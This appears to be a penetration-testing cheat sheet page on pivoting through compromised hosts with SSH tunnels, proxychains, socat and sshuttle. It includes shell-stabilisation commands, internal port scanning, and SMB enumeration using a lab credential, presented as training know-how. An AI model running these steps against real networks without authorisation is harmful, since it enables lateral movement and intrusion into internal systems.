SSH Tunneling

SSH Local Port Forwarding

When you know which port is open and want to scan it, you can use this method. However, it is not advisable to use this for scanning unknown ports or connecting to multiple services simultaneously.

For reference:

Always stabilize the shell first. Don’t forget this step, as not doing so may cause problems.

# Note: we cannot use port below 1024 as we may not be the privileged user.
# Below command will be run on the system which in between DMZ and WAN network
# Make sure you stabalize the shell and enable tty.
python3 -c 'import pty; pty.spawn("/bin/bash")'

# First connect to PGDATABASE01 then find the internal network.
# We can find open ports to connect by running the command in the scanning section of this cheat sheet.

# Create SSH Local port forwarding.
# Run this command which is in DMZ.
ssh -L <local_IP>:<local_port>:<remote_IP>:<remote_port> <username>@<SSH_server> -N

# Explanation:
# -L: Specifies local port forwarding.
# <local_IP>:<local_port>: The local IP and port to listen on (e.g., 0.0.0.0:4455).
# <remote_IP>:<remote_port>: The remote IP and port to forward traffic to.
# <username>@<SSH_server>: The user and SSH server to connect to.
# -N: Prevents a shell from being opened.
# Example:
# ssh -L 0.0.0.0:4455:172.16.50.217:445 database_admin@PGDATABASE01 -N

# Check if your port forwarding is setup or not using the below command:
ss -ntplu

# suppose if we want to access SMB share on HRShares then we will give the below command:
# We will run below command in kali linux.
# Here, the local IP and port refer to the IP address and port of the machine on which the above SSH command was run.
smbclient -p <local_port> -L //<LOCAL_IP>/ -U hr_admin --password=Welcome1234

# Limitation: you can only forward traffic to predefined ports on the remote server, and it requires you to set up and maintain an SSH connection for the forwarding to work.

# Example
# SSH port forwarding. (Used SSH Local port forwarding)
ssh -L 0.0.0.0:9000:127.0.0.1:8000 $username@$ip -i id_rsa -p 2222 -N

SSH Dynamic Port Forwarding

For reference:

Always stabilize the shell first. Don’t forget this step, as not doing so may cause problems.

# SSH dynamic port forwarding can be used to scan any port in internal network
# This works on proxying protocol like SOCKS.
# Limitation:  the packets have to be properly formatted - most often by SOCK-compatible client software.

# Make sure TTY Shell is there.
python3 -c 'import pty; pty.spawn("/bin/bash")'


# Set up the SSH dynamic port forwarding.
ssh -N -D [bind_address:]port user@hostname

# Example: ssh -N -D 0.0.0.0:9999 [email protected]

# To format the packets, We need to use socks proxychain
# add Socks proxychain in kali linux in location /etc/proxychains4.conf
# Check value using "tail /etc/proxychains4.conf" Command.
socks5 <IP_addr_of_host_on_which_SSH_dynamic_port_forwarding_is_running> <port_which_you_gave_in_above_command>

# We will use proxychain to run the commands.
# SMB Enumeration example:
proxychains smbclient -L //<HR_SHARE_IP>/ -U hr_admin --password=Welcome1234
# HR_SHARE_IP means that we have to provide IP address of host in internal network.

# Port Scanning
proxychains nmap -vvv -sT --top-ports=20 -Pn <HR_SHARE_IP>

# For fast scanning through proxy-chain you can use the command mentioned in the scanning section of this cheat sheet.

Getting filtered port with nmap and proxychains ??

If all ports are reported as filtered while using proxychains and nmap, try this script to identify the open ports.

# Change Port range and ip according to need!!
for port in {9000..9100}; do proxychains nc -zv -w1 10.4.212.64 $port 2>&1 | grep OK; done

SSH Remote Port Forwarding

For reference:

Since we're connecting directly to a single host and port, a SOCKS proxy chain isn't necessary to route the packets.

# This method is useful in environments where firewalls restrict inbound traffic.
# SSH remote port forwarding allows connections to be initiated from within the network.
# The listening port is bound to the SSH server, and packets are forwarded by the SSH client.
# While in local and dynamic port forwarding, the listening port is bound to the SSH client, in remote port forwarding, the listening port is bound to the SSH server. Instead of the packet forwarding being done by the SSH server, in remote port forwarding, packets are forwarded by the SSH client.

# Step 1:
# Make sure SSH service is started in kali linux.
# Also PasswordAuthentication to yes in /etc/ssh/sshd_config is set.
# Check Command:
cat /etc/ssh/sshd_config | grep -i "PasswordAuthentication"
# then start SSH Service and check using "ss" command.
sudo systemctl start ssh
sudo ss -ntplu | grep -i ssh

# Step 2:
# Make Sure you have TTY shell. if not then run below command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Set up the SSH remote port forwarding.
ssh -N -R [bind_address:]port:host:port user_Own_kali@hostname_Own_kali
# Example:
# ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 [email protected]

# Step 3:
# Verify using command below (run on kali):
ss -ntplu
# You will see that the port you added is now active.

# Run Command which you want to. Example:
psql -h <bind_addess> -p <bind_port> -U postgres

# This is some what similar to SSH Local Port forwarding.

SSH Remote Dynamic Port Forwarding

For reference:

# Useful when only limited port is allowed to access by AV.
# This can scan many ports at once.
# DrawBack: OpenSSH version must be >= 7.6. 

# Step 1:
# Get TTY Shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2:
# Set up remote dynamic port forwarding with a SOCKS proxy.
# -N: Prevents the SSH session from executing remote commands (no shell).
# -R [port]: Sets up a remote port forward, binding the specified port on the SSH server.
ssh -N -R [port] user_Own_Kali@hostname_Own_Kali
# Example:
# ssh -N -R 9998 [email protected]

# Step 3:
# check if listening on mentioned port started or not.
sudo ss -ntplu

# Step 4:
# Configuring /etc/proxychains4.conf file.
# Check it's content Command: "tail /etc/proxychains4.conf" 
socks5 127.0.0.1 <Remote_Port_you_mentioned_in_previous_command>
# Example:
# socks5 127.0.0.1 9998

# Step 5:
# Run the desired command:
# Example: 
proxychains nmap -vvv -sT --top-ports=20 -Pn -n <MULTISERVER03_IP>
# See Diagram above.

If you need to kill the port then use this help

https://dev.to/sylwiavargas/how-to-properly-close-a-port-2p36 In short:

# find the port which you want to kill
sudo lsof -i :portNumber
# Grep it's PID and Kill it.
sudo kill -9 PID

Getting filtered port with nmap and proxychains ??

If all ports are reported as filtered while using proxychains and nmap, try this script to identify the open ports.

# Change Port range and ip according to need!!
for port in {9000..9100}; do proxychains nc -zv -w1 10.4.212.64 $port 2>&1 | grep OK; done

Caution:

When connecting to a system using proxychains, we will not use the local IP to run the command; instead, we will use the other system that is not included in the SSH proxy configuration.

Example: proxychains ./ssh_remote_dynamic_client -i 10.4.212.64 -p 9062

Using sshuttle

# Useful when you need to create a VPN-like tunnel through an SSH connection.
# sshuttle can route all traffic through an SSH tunnel, making it appear as if you're on the remote network.
# Prerequisites: Requires root privileges on the SSH client and Python3 on the SSH server.

# Assuming you have TTY shell. if not then run below command:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 1:
# Set up a port forward to the target SSH server.
# socat: Listens on a specified port and forwards traffic to the SSH server.
socat TCP-LISTEN:[port],fork TCP:[target_IP]:[target_port]
# Example:
# socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

# Step 2:
# Use sshuttle to route traffic through the SSH tunnel.
# -r: Specifies the SSH connection string.
# Subnets: Define the networks to tunnel through this connection.
sshuttle -r [user@hostname:port] [subnet1] [subnet2]
# Example:
# sshuttle -r [email protected]:2222 10.4.50.0/24 172.16.50.0/24

# Step 3:
# Verify the connection by accessing a resource in the tunneled subnets.
# Example:
smbclient -L //[remote_host]/ -U [user] --password=[password]
# Example:
# smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

PreviousPort Forwarding with Linux Tool NextPort Forwarding with Windows Tools

Last updated 12 months ago